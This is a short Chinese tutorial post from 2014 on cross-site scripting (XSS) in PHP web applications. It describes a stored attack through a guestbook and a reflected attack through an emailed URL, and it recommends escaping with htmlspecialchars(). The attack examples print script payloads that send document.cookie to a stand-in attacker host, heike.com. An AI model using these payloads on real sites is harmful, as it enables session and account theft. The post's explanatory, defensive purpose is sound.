web安全之跨脚本攻击XSS (wen安全) 20140316
一 简介
跨站脚本攻击是众所周知的攻击方式之一。所有平台上的Web应用都深受其扰,PHP应用也不例外。
所有有输入的应用都面临着风险。Webmail,论坛,留言本,甚至是Blog。事实上,大多数Web应用提供输入是出于更吸引人气的目的,但同时这也会把自己置于危险之中。如果输入没有正确地进行过滤和转义,跨站脚本漏洞就产生了。
二 攻击流程
1》》通过在留言本里输入内容,进行攻击
攻击者在有XSS漏洞的网站留言板等可供用户输入的页面,写入一下脚本:
<script> location.href="http;//heike.com?cookie="+document.cookie; </script>
后端程序将这段代码插入数据库中,在用户调取后打印到页面,就会执行这段攻击脚本,是页面跳转到黑客自己的网站,documnet.cookie 作为参数传递到了黑客网站。
攻击者查看自己的网站web服务器日志,得到用户名和密码,再进入用户网站,进行攻击。
2》》给用户发送电子邮件 url攻击
给用户发送邮件url,http://www.hellow.com?user=<script>location.href="http://heike.com?cookie="+document.cookie<script>
链接传送到有url接口的网站,网页显示超链接,用户点击后链接到黑客网站,黑客调取服务器日志,攻击开始。
三 防范手法。
在有用户输入的网页的页面使用htmlspecialchars()函数对内容转义。
在有url接口的网页使用htmlspecailchars函数对get参数转义。
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。